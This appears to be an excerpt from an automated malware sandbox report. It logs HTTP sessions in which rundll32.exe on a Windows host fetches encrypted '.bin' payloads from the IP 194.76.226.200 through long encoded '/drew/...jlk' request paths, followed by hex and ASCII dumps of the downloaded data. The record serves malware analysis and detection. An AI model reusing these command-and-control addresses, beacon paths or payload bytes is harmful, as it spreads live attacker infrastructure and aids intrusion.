63 3b eb 80 90 73 e7 ec 24 40 94 f0 a9 2f b8 db d8 33 c3 16 a7 2f fe eb cf 3b 01 f2 b1 51 9b 60 07 8c 7b 63 93 44 26 8d b7 ef 24 46 1b 61 71 a9 6a eb 5b 7f 79 93 d7 d1 7e 0d ca f6 93 48 e2 b2 3b 0f 6f 05 94 5d 16 58 25 ef ea e5 ff 5b e9 01 84 71 a3 4b 17 20 2a 79 0f 12 7b 26 ff bd d7 56 cb 30 91 35 69 4b 0a b1 34 12 d6 cf d7 54 01 1a 9e f1 32 69 9c 1d 55 46 91 fb b5 55 b9 fc 09 6b c8 ae 5c 74 ed 69 bb fe 85 58 bc cd 3d 88 e1 f0 b3 4f cf 7b e6 41 a2 f0 7c 6f 76 01 1a 14 33 47 5c aa e1 b8 3d c9 81 d6 dc 23 8d 90 12 a3 b9 e1 ed 50 ab 0e 1b d9 f3 45
              Data Ascii: FiV<>385ZdRB%r+%.aB<#eI!tE}<Ob5U[>3_,xXtXr+~Z."eyn(j!TB\Z7Mf:4a` rw~6eb_u1,YZ_bZ/ZGiZ~qM 3){8IU,qOLg/NXz\|r}3/b%wAyE+F<feoZ!x)@@=ZRrVRQt@b(4Vl8/{tD=8:5yEQ{:#$hwxS1(TB-+mVwa"GSc3pSEb~gh%f2y#:s_xZ.$n]A}Gsw'P?M~g(K-w5\92yyh{B4Dmq,'s{1GZ%>:W.?yskaC$}$&h :iWNE92AT&x; |BkDBu\.3{(&~bAPt1*;T|$VT!QRfh>^L`oe!bd9h_2&/?2u:c;s$@/3/;Q`{cD&$Faqj[y~H;o]X%[qK *y{&V05iK4T2iUFUk\tiX=O{A|ov3G\=#PE


              Session IDSource IPSource PortDestination IPDestination PortProcess
              1192.168.2.349753194.76.226.20080C:\Windows\SysWOW64\rundll32.exe
              TimestampkBytes transferredDirectionData
              Jan 26, 2022 10:28:10.427335024 CET1109OUTGET /drew/2f3T6_2Fldpw_2BA6Engti/ap9anBYrptHHy/xCGyvO5i/wYPccsVOVAKMkuNvsUxMYE4/RkZB4YqLqe/XacN1M_2FaB24Ib2R/hVRxOozHufuZ/c6WQY_2FOGu/wQlIyAdYSezuQl/ojNT2IxdKraylKm035Q_2/FdvJBuYlSvhCsegR/oboSzu_2BtJ_2BW/XMLPOefEKMYQuO_2B_/2FNWtFwdl/dQERZJKq6wr_2FxRn8R5/MLhj_2Fz9ge97_2BBFz/rUr1Agrx59/b.jlk HTTP/1.1
              Cache-Control: no-cache
              Connection: Keep-Alive
              Pragma: no-cache
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
              Host: 194.76.226.200
              Jan 26, 2022 10:28:10.705521107 CET1152INHTTP/1.1 200 OK
              Server: nginx/1.18.0 (Ubuntu)
              Date: Wed, 26 Jan 2022 09:28:10 GMT
              Content-Type: application/octet-stream
              Content-Length: 205974
              Connection: keep-alive
              Pragma: public
              Accept-Ranges: bytes
              Expires: 0
              Cache-Control: must-revalidate, post-check=0, pre-check=0
              Content-Disposition: inline; filename="61f1142aa843f.bin"
              Data Raw: 0b 34 4a a5 90 0e c7 6f 93 f0 c9 9c 13 02 b2 b5 cc 76 30 92 6d 0e 22 4f c9 58 34 d7 fe b5 ba b7 5a ab 0e a3 52 08 62 4c 78 fd 91 22 35 10 c2 d3 61 1c 83 02 81 d8 3b c6 4c 9f eb b4 93 cc 31 0c 68 76 c0 57 f4 7b a4 04 53 d7 14 5d 88 7d 03 7f 09 50 4e 57 7a 07 db 05 d1 c4 36 78 ca 9d 10 4e ac a5 10 d0 07 02 c5 07 66 1b 6c 2b 79 30 7f 1d 61 fa ac 7f 36 be 4a 04 de 90 63 1a 5b eb 1a 72 1b 4f 2b 13 db 9c e2 df ae bc dc b0 ca 11 68 65 0d 38 ae be 00 a2 bd de 57 9d 31 ab 78 b9 89 12 36 b3 5a b7 d9 1b df fc 64 47 88 e6 91 15 96 e3 4d b2 e6 5f d6 d8 58 8f 3a b2 67 59 28 e5 38 d6 f3 d4 ec c8 10 cb 0f 32 41 a7 2a d0 1f 18 bc 53 77 e0 20 7c d9 e5 cf 26 82 51 e7 3e 03 7e 6e fa 82 c6 5a 4f 55 0d 03 d4 ae bf c0 d0 28 38 d8 07 65 cf 62 68 a7 c1 c1 d1 04 9c 39 0e 98 08 1e 90 cd 54 de 73 d1 7d 48 94 0f e7 c3 6f 7a 6f 11 8f bb 47 84 66 c5 95 8c 15 cd ea 00 37 32 9a 90 18 45 54 38 b7 be e8 a1 cc 90 1b 98 f1 f7 5a 39 ed 58 2e 04 21 85 12 70 7e 32 24 af ae 9e fb f0 56 71 b6 4f 4b db 22 16 8a 68 b9 da ae 4c a4 5e 8a 77 c8 50 57 04 fc 36 4d c9 28 17 cc a9 81 22 5d 70 7d 9c 4d 02 d1 7b 80 bb 0b e2 ca 73 5a 01 64 06 8f 11 cb 55 51 80 c1 18 c1 c9 38 11 f1 13 d6 39 8d df 7c c4 5e 86 65 c8 35 0a 13 62 48 d7 63 b1 c8 c7 a1 4f f7 6d 06 b5 57 50 fd 27 7b e8 0c 6a 1e 71 3c 3d d8 b8 0e 92 d2 51 19 3e 30 75 20 1f f4 aa 5f a3 2e 32 8a 0d a5 9f 80 7f fd 5b 6a 34 7b 2f 49 f0 28 0b 2b 1b 91 d8 0c 02 6b 60 96 ca 7c 5b 3f f2 0e 4e e1 a6 3a 7d a3 b6 31 11 ca 38 ad 77 4f 69 88 5b d8 dc 1c 50 fc 43 23 dd 4f 28 ab 4b 83 97 d9 83 86 37 d4 35 ee de 1e ed 9f 4b dd 00 a3 72 52 c7 27 04 4d 81 eb e9 ec 96 aa f9 2e 3f 42 c9 06 71 55 3b ac 74 d6 c3 51 95 7c a9 88 a1 29 cd 87 8b 8d 91 80 c2 27 be 0a 9a 79 c4 71 2f 66 cd 0d 8f ea 0b 71 9c 31 65 9c b4 71 c7 83 db 73 ef 97 72 58 6b ec 28 a0 a2 3d 78 f2 60 48 bd de f7 4d 89 e4 48 56 c7 c7 33 40 4f cd 43 22 8e e4 4d 45 8d 73 df 8f 3b 90 ff 56 18 e1 52 36 d5 ad bd 2c e6 ab d4 98 46 02 74 39 79 e3 9d 17 d0 64 90 67 45 46 51 f1 67 82 66 1f 8c 5d 2f d4 55 75 55 00 e1 f5 7d bc b1 1d dc e3 cb 0d 0f 1d 20 b2 78 4b 19 50 9b 9d 80 05 ad 82 b1 4a 3d a9 c6 8d db f6 d1 40 f3 1a 7f 08 ee 73 12 77 8d f0 26 11 a9 d2 b2 53 5f cd 10 a7 56 ee 93 fb 29 64 a4 0d 0c 5a b7 dd f2 4d d8 ac d3 2e 26 e7 8b 9b 7a b8 46 13 e9 c5 1c a2 84 04 46 b6 03 bc dc 61 89 60 bc 13 9e 91 fa d6 f3 ea 0d 74 f1 38 9b 17 fd 5a 50 d8 4f 55 d3 bd f2 87 17 1a 66 8d 83 19 72 7f 9a 6d 49 86 65 84 7a 01 74 85 b2 c3 1d 24 dd 41 ae c5 26 a2 88 c2 f8 ee 1f 8b 69 75 6d 97 da 41 2d 1c 40 fb 6c 84 ee 4e cc e2 be 87 77 6e 71 f8 6c c4 5c 80 74 ca 68 f2 43 f6 3b ab 9d e3 3a 5f d2 44 73 0e be 3b 81 44 26 a5 16 3f 25 ba af e4 df 06 9c 06 17 77 74 07 91 08 54 dd 3d 33 1d 89 0b 05 11 e2 e7 cc 35 63 3d 83 27 fc 18 6e 35 dc 0e 03 ac 48 0e c6 06 d7 2c fe 39 2e 2a a3 29 3c ed c6 e5 88 ea bc 33 77 d9 07 43 16 a8 a3 36 e1 64 5a 40 a3 c8 50 1f fc a8 1d dc 70 3f 8f 91 29 e5 46 82 3a 29 d0 07 c8 e2 80 2b f0 30 a3 39 18 0e b1 c8 d9 db 90 7d 26 dd 91 2f f6 8e 45 3e 1b 26 e1 6f 5b 1f 0b f1 b9 12 d0 62 7e 46 46 19
              Data Ascii: 4Jov0m"OX4ZRbLx"5a;L1hvW{S]}PNWz6xNfl+y0a6Jc[rO+he8W1x6ZdGM_X:gY(82A*Sw |&Q>~nZOU(8ebh9Ts}HozoGf72ET8Z9X.!p~2$VqOK"hL^wPW6M("]p}M{sZdUQ89|^e5bHcOmWP'{jq<=Q>0u _.2[j4{/I(+k`|[?N:}18wOi[PC#O(K75KrR'M.?BqU;tQ|)'yq/fq1eqsrXk(=x`HMHV3@OC"MEs;VR6,Ft9ydgEFQgf]/UuU} xKPJ=@sw&S_V)dZM.&zFFa`t8ZPOUfrmIezt$A&iumA-@lNwnql\thC;:_Ds;D&?%wtT=35c='n5H,9.*)<3wC6dZ@Pp?)F:)+09}&/E>&o[b~FF
              Jan 26, 2022 10:28:10.705549955 CET1154INData Raw: 41 1e fe e1 f1 ae a3 57 10 dd a0 5a ca b8 50 30 d7 31 ea b4 01 7d c2 91 09 08 ce 9b d1 e6 ae 6c fd 9e da 16 2a 6a 80 64 7f 63 cb 76 b1 e5 70 b3 4b ee ae 74 a8 07 13 22 4b 4d e3 26 0a 0e bb b8 51 ea 8f 9e 44 a0 8d 09 23 0d 24 94 39 77 f8 a2 f1 be
              Data Ascii: AWZP01}l*jdcvpKt"KM&QD#$9w"rh=EMw Xxc0~QSmdo8-3eehDx9p1;xt0ccU_n9G~X$$Z~W/sQwI9R:(Ka>k
              Jan 26, 2022 10:28:10.705574989 CET1155INData Raw: 0a ca f3 c8 64 af b7 9c 50 26 44 70 2c 49 ff fe 67 7c 2b 05 27 83 9d ca d1 41 18 02 0a 1a 69 be 8a 10 be 39 ff 50 5e cb 38 a1 51 e9 b8 25 c3 da 00 ce b2 d3 11 05 ff ac ef cd 0f 59 9b ac 6d e0 09 ff 46 68 14 b7 81 d5 da 21 d7 10 14 ba f5 d7 a3 71
              Data Ascii: dP&Dp,Ig|+'Ai9P^8Q%YmFh!q%KNZ6uFY-]_;D[V`>l0&}Lc{+%L9",~uGKU/N^lNw3b3HU/]0e:$A}D"KJ
              Jan 26, 2022 10:28:10.705594063 CET1156INData Raw: ca 39 82 32 ae 72 18 43 1c dd fd 9b ed f6 51 8d ab c6 11 93 a3 20 6e 4b 45 a0 05 a1 80 3f 8d 61 0c 33 55 27 ba 6c 58 57 e5 a2 d4 6a f3 b3 69 e0 3e 0d bb 52 e4 78 c8 75 a6 a1 3c c3 1b 3b d0 ab c4 67 e2 1f 96 3e fb 45 87 8a a9 92 b9 41 ab 64 84 02
              Data Ascii: 92rCQ nKE?a3U'lXWji>Rxu<;g>EAda!i6MT%s9WBIRn<mywgVS*;N+0Ne"D+4`_8K7{g<T<FJ. 7H/=}
              Jan 26, 2022 10:28:10.705621958 CET1158INData Raw: 2f da e6 93 1c a7 c9 16 59 cf 4e 4e ad 91 65 c2 8a da 4b be d1 0c bc de 95 69 0b 8a 07 73 b2 86 1d cf 52 a3 44 c3 a2 5d 4a 22 1c c1 7c 10 9d 26 f5 e4 e3 96 0f 93 73 85 b6 92 35 64 27 a7 d9 16 0d 58 c3 ff 09 4c c5 6f 63 9a ce 1a 10 a7 b6 d1 97 58
              Data Ascii: /YNNeKisRD]J"|&s5d'XLocX'|RQy4MoPg37L_>2dZ}5xNYg'uP]YgH8+6uwHZ@F,D]y]4-d5VpBmKK
              Jan 26, 2022 10:28:10.705637932 CET1159INData Raw: 2b 1d da c2 1d 24 4b f5 b5 ea a5 b2 62 ea 22 a0 72 b6 c7 3a cd dd 7a a3 b2 48 b4 c1 0a 16 9b b3 2b b2 92 14 9d f2 6d 4b 94 43 6a 10 36 cf 56 b9 06 d7 99 90 a6 6d 24 a6 71 8b 1c 56 02 7c 48 0e 94 7c 42 8a 13 68 47 5f 9a 99 f1 fa 2a 72 3a 87 da 1c
              Data Ascii: +$Kb"r:zH+mKCj6Vm$qV|H|BhG_*r:!>QBE.}fS.%;$-<*@_yV1aio /{-0D<mzC.HRto.N,/UjV#|G=XHjpG>Kt<]B
              Jan 26, 2022 10:28:10.705718040 CET1160INData Raw: 3a 5c 45 2a fe db 99 e8 c3 fe 61 44 7a e7 f7 ef 0c 17 e0 d7 65 eb e4 80 70 32 e8 72 16 e7 dd 93 ba b3 f2 d4 b3 1a 70 b9 04 67 92 ab 70 29 f5 4b 2b d9 ad 6d 6f f5 a9 5a 41 33 14 50 da f9 d4 2e 7b 4f 8e 4b 43 d8 b4 b6 22 42 53 b1 f2 70 6d c6 53 59
              Data Ascii: :\E*aDzep2rpgp)K+moZA3P.{OKC"BSpmSYfXo|u_vMGht\mu0QRNuegGi|r45!Z2EYoa5n)
              Jan 26, 2022 10:28:10.705913067 CET1161INData Raw: 1f 46 dd 39 6a e7 ee f5 53 dc 9b 06 ac 90 d4 3b 67 ae 1b c1 52 b2 50 76 d3 e8 37 e1 a6 db 59 88 06 5a 11 85 02 ec 0d ea 01 33 81 bf e6 76 e2 96 d7 26 1d f3 32 ab 6c 59 68 42 c2 e1 f6 80 ba bc 63 e4 e6 31 d8 7a 89 b4 fa a7 59 58 62 d8 c3 4e fd d9
              Data Ascii: F9jS;gRPv7YZ3v&2lYhBc1zYXbNIbt]rDxY3-vmua{eiwcU3){_+r$1B|2iR?}_.B`T>1KR8K vvw%/yN+@|cxgR
              Jan 26, 2022 10:28:10.705933094 CET1162INData Raw: 98 2c d9 b4 4e f3 68 58 f9 0e ab 80 69 3b ef 41 53 03 60 a4 6f 2d ca b3 91 be f8 e0 06 cc 2b 9c 3e 70 83 bb 26 bb db b3 f9 4d 08 88 74 1c e6 4f d7 36 2b 72 01 1e d8 a8 7d cc 2e 91 a2 b1 ba 25 8b 83 40 cf fe 89 83 9a 85 e6 ad 57 67 3e 26 a7 36 1d
              Data Ascii: ,NhXi;AS`o-+>p&MtO6+r}.%@Wg>&6`8~ZCs?O23d!,!w(E3AHNc+xYw!3't3-!Rs;~p)T9;yEu\A>;CR%2f=`A
              Jan 26, 2022 10:28:10.706017971 CET1164INData Raw: c1 88 d1 4b d7 fa 8f 60 1a a7 4c fd 83 e2 de 6d 85 53 29 12 be f7 e5 8f 0f 90 6a 0b 0c 82 3f f7 5d 96 02 48 71 95 08 d4 66 07 a7 a6 a4 e6 f5 8f 84 21 7c 96 8f d6 c2 65 10 44 84 a6 d9 01 2d 90 3a 9d e2 8b 40 6e d9 c3 bb 1a 50 65 80 f1 e7 5f c0 3a
              Data Ascii: K`LmS)j?]Hqf!|eD-:@nPe_:42\)%uu{{d\{x<J/InJ<0%GWc(x8aHH:grs'w9Xf>C"+F/3"csi\gy4uJ!iZj[
              Jan 26, 2022 10:28:10.725728035 CET1220INData Raw: 4e 21 85 2d 19 14 20 8f a4 df 90 16 75 d9 f0 db 92 b5 d1 99 25 b8 71 b8 e2 fb 02 95 4f 85 58 01 6b 41 c7 e0 22 cc 72 ea f2 cf 73 8c 2a 89 cb 20 26 2c cf 12 a2 8f 4a 58 5c 42 41 94 c1 af dd 3f b5 a7 a7 54 2b e7 54 b9 1c 3c 4c 42 5e 50 ee 5a 8d 04
              Data Ascii: N!- u%qOXkA"rs* &,JX\BA?T+T<LB^PZwk~x,GH'dlyndS\>znPtx]<`N__N2J<'$8J@"`Z30E:Z68IwQPc1ypYKq,4yZYY"D!s@Yu \rx5<{
              Jan 26, 2022 10:28:10.883430004 CET1760OUTGET /drew/1sAtgPIBWWyXis_2FA/6GIdiDz41/F8DsJCsC5dAiiAp40xO_/2FPXx_2BF1qO46g3cTx/u5HuMo3uztxcUiL23t82FF/kkG2LxXPj08tg/H_2BJGnO/cP97dD1bDaB8ARH5ISgaEh8/3o1VSIlvAE/fAY7fRQsRaiXUwpok/xVsDrvhLU9b_/2FX5Wo3hVjQ/iMxJEhzERdYzAI/_2F44rqzPuWQ9p1F4Yhmb/gVtKSgiFTUu0Sz_2/FYShPBpN48b/U_2FavA.jlk HTTP/1.1
              Cache-Control: no-cache
              Connection: Keep-Alive
              Pragma: no-cache
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
              Host: 194.76.226.200
              Jan 26, 2022 10:28:11.158659935 CET1763INHTTP/1.1 200 OK
              Server: nginx/1.18.0 (Ubuntu)
              Date: Wed, 26 Jan 2022 09:28:11 GMT
              Content-Type: application/octet-stream
              Content-Length: 262298
              Connection: keep-alive
              Pragma: public
              Accept-Ranges: bytes
              Expires: 0
              Cache-Control: must-revalidate, post-check=0, pre-check=0
              Content-Disposition: inline; filename="61f1142b22c19.bin"
              Data Raw: bc 58 44 2d 3f 69 1c 31 6f 19 ce bd 43 f0 20 48 2f a8 05 9b 0e 7a 3e 20 f1 f5 39 03 5c ec 25 14 47 ca 20 58 0c 21 39 da 11 c2 cf 7d ea e9 bd e0 29 31 a9 65 5b 07 36 21 bc bd 3c 8d 80 a7 96 dd 76 86 90 74 45 b9 fa 0c 05 46 10 a3 e9 f0 9a 00 ca 11 6e 65 f9 dd 9d 9e 33 63 61 96 0d 7f bc 6d 8d a8 fa 74 5b 85 1f 03 07 2f 96 87 82 0b c0 50 5b e2 9b 0f 15 ef 3a 18 83 ed 78 e9 24 bd d5 50 65 eb d4 69 41 35 6c 8b 36 81 b0 b7 83 87 f2 99 9c dc 14 4c 1a 9e 39 2a 93 cb 6a 9f b7 da 70 12 ff f3 e9 54 c1 a0 da e7 c8 3b cd 2b 9e 48 f8 94 94 82 5c 2e 01 04 3b ba cd a4 44 0b d1 57 48 d1 40 8a 69 00 8a 79 dd 8d 7f 68 fe db 65 87 08 d5 9d 19 70 c1 d2 12 63 26 8d b8 8f eb e2 d4 f6 0c 7d bc 55 af 67 0e 49 6d 0e b0 bd d1 80 06 ea 38 2b 65 3b 8e 6a 76 d7 f7 89 2e 85 0a c9 be b2 8c 42 42 4f 7b 28 2c 6d 27 b9 7b cc 91 47 6f 1f 88 98 1e 3e d4 28 68 c2 c6 76 65 3d 09 3a a5 72 b4 46 f1 e0 d2 94 e7 57 7c e8 19 8c 31 83 ce 83 e7 97 ce 0d 51 ff c2 23 5d df 8e 64 07 b2 10 d9 cf 61 82 c5 34 79 bc fd f2 a6 c1 4e ef 21 d0 c9 a8 a5 ac 9c ad c4 94 e9 f2 fb a7 38 f6 f7 3f ce 80 69 78 cd 93 be d3 de a3 10 69 6a 51 2d 59 9a 13 e0 53 b1 6f 72 a4 e1 7f b3 90 b1 fc d9 aa 59 bc 59 97 82 64 99 0b ac a8 04 bd 04 4c b6 24 de 0d 53 fe 01 a3 13 6e d8 22 78 59 53 fe 95 18 0c 81 d7 5f 8a cd 05 69 1c 65 4a 9b 24 46 06 ac fb 49 9d de 37 60 ae ee c6 6b 29 02 6c 0e a1 3b e0 0e 43 a4 1b 5b 9b c0 e8 8d 54 45 de 9a d1 7b 85 30 17 70 2e 5e fa d1 ea 55 b7 09 4a 45 19 fd 62 7d d2 c2 37 e1 59 70 cb cb f0 59 12 f6 21 3d f8 f7 9e e0 e8 e5 02 1e 2a 2d a8 96 a4 77 f2 5a 2a ef d7 3e 65 47 a9 bb 0f ac db c5 65 7c 27 de b3 3a c9 4a 7a f7 24 47 cf f8 cd e4 d7 14 66 55 28 59 d9 9a d7 12 6e a0 84 de a0 76 b4 cc c5 48 c8 d7 da ed f3 f6 89 a3 23 08 7a d6 31 49 1b e9 e7 f5 6d ad ef 63 c9 09 43 4d d4 6e 47 18 ac 32 2b 65 3e 82 1d 23 61 ac 1b a2 06 be 9d 19 7b 20 df cf 5a 03 ac 9d 11 d3 47 69 f2 af ce 4b ad a1 ef 2b fc 8e 36 0b db d3 e8 4b cd 90 d7 c4 92 08 94 9b ae 29 f1 7f 1c f8 80 24 55 8b 13 76 d8 9f 21 95 73 57 a8 e4 ad be 38 75 6d fc 51 42 da 45 01 ce be a8 8e bf 1c 27 2d 78 d4 11 a5 de 6d 95 43 00 61 1a 51 12 77 fa b9 66 a5 85 6e 81 9b e4 d6 d3 38 f2 eb 8f 6f 53 50 e7 b4 4f a0 f6 69 88 5b 7b c9 03 a4 02 a7 22 52 c6 cd ec d7 dd 58 53 72 01 a5 ea 13 88 ee ef 11 74 a2 bb a7 5a c3 df 31 00 6b ae a5 2c 3e 2d ae 96 ac 4e 83 f7 22 7b 95 a1 31 5a 5d cb ec cc 1a 30 9a c8 2e c3 ed d6 0e fe 52 10 aa d4 ef 89 c6 37 cf fa cd ec c6 8e 8b 1c 5c 25 7c fd 28 86 e8 72 01 b6 e2 94 96 0a 71 4f 83 2d 17 55 15 40 67 58 d8 63 b4 d1 ac 11 2e 37 21 1c 87 20 31 1f 0c 46 58 bb bd ac 41 e6 de 27 05 ca 9c 2d 48 d8 ef 9a e1 71 92 d6 32 99 0d 05 06 b5 45 8e 7a b5 1d b6 89 fa 46 1a e3 d4 79 21 b8 92 e5 c3 80 40 10 5d 85 c8 10 a5 41 c9 0e c6 a2 34 a1 fe b9 e0 85 93 9e 82 3e cc a0 69 a9 d5 7e 1e c3 f2 3f 74 9c 1f 33 20 ec 8f 5a 4f bb 8f 8f e7 42 99 ac 96 ae b4 51 30 56 2f 40 53 32 2f 92 bf 80 4d e5 84 a4 7d bb 6d 96 8c e2 2f 32 c1 b2 a3 da dc 2f fc c6 e4 ea 5b 7c 88 44 b3 05 8f d6 94 0f 25 19 c3 c4 c4 0b 74 37 12 d5 4d ac 86 2b 00 39
              Data Ascii: XD-?i1oC H/z> 9\%G X!9})1e[6!<vtEFne3camt[/P[:x$PeiA5l6L9*jpT;+H\.;DWH@iyhepc&}UgIm8+e;jv.BBO{(,m'{Go>(hve=:rFW|1Q#]da4yN!8?ixijQ-YSorYYdL$Sn"xYS_ieJ$FI7`k)l;C[TE{0p.^UJEb}7YpY!=*-wZ*>eGe|':Jz$GfU(YnvH#z1ImcCMnG2+e>#a{ ZGiK+6K)$Uv!sW8umQBE'-xmCaQwfn8oSPOi[{"RXSrtZ1k,>-N"{1Z]0.R7\%|(rqO-U@gXc.7! 1FXA'-Hq2EzFy!@]A4>i~?t3 ZOBQ0V/@S2/M}m/2/[|D%t7M+9
              Jan 26, 2022 10:28:11.422935009 CET2175OUTGET /drew/HzhM5fP5x43l7rSkYr8Y/jYk_2FxetzKCt9WlQ60/DHr3pyDc_2BukVZ7K3nBXi/MEA2Xn3fXlFfO/GgBWR09O/Z1DKEGLlegReZBua8Nnmy16/fhqdF_2Beg/hrDVYSGiYpSkF5kA7/KsGOnRLVKqBx/xsw07jdGhl6/opBuLWprNFNT7s/OVJpMrjpCjISLpLDnGaGt/ixsS7exYYQrwdM8F/_2FgW9_2FjtCahO/8Yp45dJrj8Sd2mVa6W/QapGna.jlk HTTP/1.1
              Cache-Control: no-cache
              Connection: Keep-Alive
              Pragma: no-cache
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
              Host: 194.76.226.200
              Jan 26, 2022 10:28:11.693049908 CET2591INHTTP/1.1 200 OK
              Server: nginx/1.18.0 (Ubuntu)
              Date: Wed, 26 Jan 2022 09:28:11 GMT
              Content-Type: application/octet-stream
              Content-Length: 1800
              Connection: keep-alive
              Pragma: public
              Accept-Ranges: bytes
              Expires: 0
              Cache-Control: must-revalidate, post-check=0, pre-check=0
              Content-Disposition: inline; filename="61f1142ba4ce6.bin"
              Data Raw: f7 46 fb 9e 69 b9 56 c0 85 b5 3c ae 3e aa 33 38 35 5a 64 d6 52 bc 42 12 16 86 d3 f7 ff 19 25 a1 c8 72 2b cd 25 8a 0f 08 f0 2e e4 61 ba 42 9d 9e ee 3c 23 65 bb 49 f2 14 21 9d 9f bb f8 74 45 7d af 3c 4f 96 e8 0c 62 35 ae 13 55 7f f4 5b 3e ec 33 8a 5f 02 aa 2c bb 78 58 74 91 ef b2 91 fc 07 b1 e7 58 01 16 72 83 2b 7e 5a 2e 22 8b 9a 65 0b d7 79 6e 0d e7 28 15 6a e8 b1 91 82 21 54 f1 42 d4 5c ed 5a 9c ad ca f0 37 09 c3 4d 66 b4 a8 3a bf 34 89 96 61 91 fe 08 92 fa 9f 07 60 20 f9 72 77 bb 00 7e de 0d c5 36 8a 15 d9 0b d3 65 62 da dc bf de 5f 75 31 c8 2c 19 59 bb a0 b5 1d cd 5a 5f a9 ef 87 62 5a b8 2f ac b2 11 ba 5a 0e 85 47 da bb e7 69 e5 5a c5 8c 7e 71 4d cc 84 0c ca 20 e6 fc ea e1 ae 33 29 98 ea 7b 38 ab f4 89 e3 49 13 e8 f4 12 e2 b3 55 2c 03 e7 b0 71 4f 4c c1 67 d4 2f 4e 58 7a 5c 7c c7 91 c9 1f fb a9 00 72 7d 9e aa ed 09 bb e1 ea 33 18 c0 d8 95 2f c5 62 25 0b 77 08 41 79 0e 45 9e d9 2b fe e2 ff e7 46 c5 3c 9c 66 88 d2 65 6f d2 88 5a d0 b6 ad 21 b8 01 78 29 d4 8a 06 b1 40 40 bf d5 3d f3 f2 e8 5a fd c5 52 a6 bc 72 a5 1d e9 fe ff 88 56 52 a7 51 8c 13 e5 cb c9 d4 8b 03 7f bb 74 fb ac d1 e1 00 d2 40 cc 15 62 fd 28 ae d8 34 fd 56 dd 6c 02 c9 38 19 2f ff df ce c5 7b 74 cc 44 3d 9c 38 ea 8d 3a 35 f4 c4 01 79 8e 45 d4 c5 dd 89 51 09 7b 3a eb c5 23 9a c6 b6 24 68 77 a9 fb b9 ae c7 ad ae 82 05 1d 78 53 91 a8 80 31 28 10 54 42 2d 2b 6d 56 81 77 61 22 86 c5 47 fa 9a 53 8d bd 63 91 d5 01 a2 1c 33 70 53 45 62 7e 67 68 c2 25 eb 66 32 05 09 0b 79 d2 23 03 03 d2 3a f3 73 e2 c6 5f a8 02 78 b2 d6 5a 2e 24 6e f7 81 5d c4 a4 f2 1e ac 17 c2 eb 88 10 41 7d 02 c7 f9 c0 47 f5 73 8f 0c 15 77 09 27 50 3f 4d fe 7e 88 cb 97 9f 1f 67 28 83 81 84 a1 4b cc 96 e8 d8 2d 77 d2 a0 35 fc 5c c9 39 b0 32 79 1a 79 fb 68 7b 42 34 f4 a9 bb bc 44 6d 8c 97 71 2c 08 c7 8b d8 96 27 1e ed 11 b0 15 a2 16 73 18 fa 7b 31 dc d6 47 5a 83 a7 86 a5 91 84 19 02 d8 99 1f dd 25 a2 3e ee 3a 57 9f 14 d7 0b 14 b4 c3 2e 0c 9c 1c 82 eb ef 3f 79 73 0a 6b c1 1f ff bd 61 83 96 43 15 24 7d 24 26 68 20 d0 0c 3a 69 57 e7 84 4e 04 45 00 39 98 a6 0a 32 41 54 26 8d 78 f2 ab 3b 20 7c b5 42 eb 10 e5 6b 44 e5 f5 9a be d3 42 f8 16 75 bc 5c 2e e0 33 7b cd cd 80 de 28 00 da 8d 26 0e cd 12 fc df be f4 7e 62 e2 1f c9 41 c2 50 74 c5 ac 31 fe 87 d6 9a bf 2a 3b fb 54 1d 7c e4 24 56 54 21 51 52 66 d7 68 04 3e 8a 5e 97 4c fb 60 8d 6f 65 19 9a f8 b0 c4 e0 21 62 ae 1b 91 96 d0 e9 64 c9 94 39 68 9b bd ef 96 5f 8c 09 32 26 fd 16 ee f6 a3 da 2f e8 a6 e4 d5 3f 8b f0 32 ce cb bf 75 ae d3 3a 63 3b eb 80 90 73 e7 ec 24 40 94 f0 a9 2f b8 db d8 33 c3 16 a7 2f fe eb cf 3b 01 f2 b1 51 9b 60 07 8c 7b 63 93 44 26 8d b7 ef 24 46 1b 61 71 a9 6a eb 5b 7f 79 93 d7 d1 7e 0d ca f6 93 48 e2 b2 3b 0f 6f 05 94 5d 16 58 25 ef ea e5 ff 5b e9 01 84 71 a3 4b 17 20 2a 79 0f 12 7b 26 ff bd d7 56 cb 30 91 35 69 4b 0a b1 34 12 d6 cf d7 54 01 1a 9e f1 32 69 9c 1d 55 46 91 fb b5 55 b9 fc 09 6b c8 ae 5c 74 ed 69 bb fe 85 58 bc cd 3d 88 e1 f0 b3 4f cf 7b e6 41 a2 f0 7c 6f 76 01 1a 14 33 47 5c aa e1 b8 3d c9 81 d6 dc 23 8d 90 12 a3 b9 e1 ed 50 ab 0e 1b d9 f3 45
              Data Ascii: FiV<>385ZdRB%r+%.aB<#eI!tE}<Ob5U[>3_,xXtXr+~Z."eyn(j!TB\Z7Mf:4a` rw~6eb_u1,YZ_bZ/ZGiZ~qM 3){8IU,qOLg/NXz\|r}3/b%wAyE+F<feoZ!x)@@=ZRrVRQt@b(4Vl8/{tD=8:5yEQ{:#$hwxS1(TB-+mVwa"GSc3pSEb~gh%f2y#:s_xZ.$n]A}Gsw'P?M~g(K-w5\92yyh{B4Dmq,'s{1GZ%>:W.?yskaC$}$&h :iWNE92AT&x; |BkDBu\.3{(&~bAPt1*;T|$VT!QRfh>^L`oe!bd9h_2&/?2u:c;s$@/3/;Q`{cD&$Faqj[y~H;o]X%[qK *y{&V05iK4T2iUFUk\tiX=O{A|ov3G\=#PE


              Session IDSource IPSource PortDestination IPDestination PortProcess
              2192.168.2.349754194.76.226.20080C:\Windows\SysWOW64\rundll32.exe
              TimestampkBytes transferredDirectionData
              Jan 26, 2022 10:28:10.463294029 CET1110OUTGET /drew/m0QZKcj4ankL3W/8FVzGu6iQpcBkrTN5v3eZ/A6WzaqZBs9gogbdq/m8YEYG_2B_2FLSM/NM7eY2w3b1aL2aX8An/zJ6Vy7aKV/77q51XwDss_2Bne92xk6/rrRqhSV7rhVbP2hjU6R/_2B0H8cg3MM0IyieU8GPC9/gTwDi0Qx4J0HW/gyC_2FqL/iUkABk5euk2dlDO3ecBxilL/xQJUPbO4iF/9AhmuI174lSXWne_2/Fo5eEhaaDB/xKb9szQ5MHJ/1.jlk HTTP/1.1
              Cache-Control: no-cache
              Connection: Keep-Alive
              Pragma: no-cache
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
              Host: 194.76.226.200
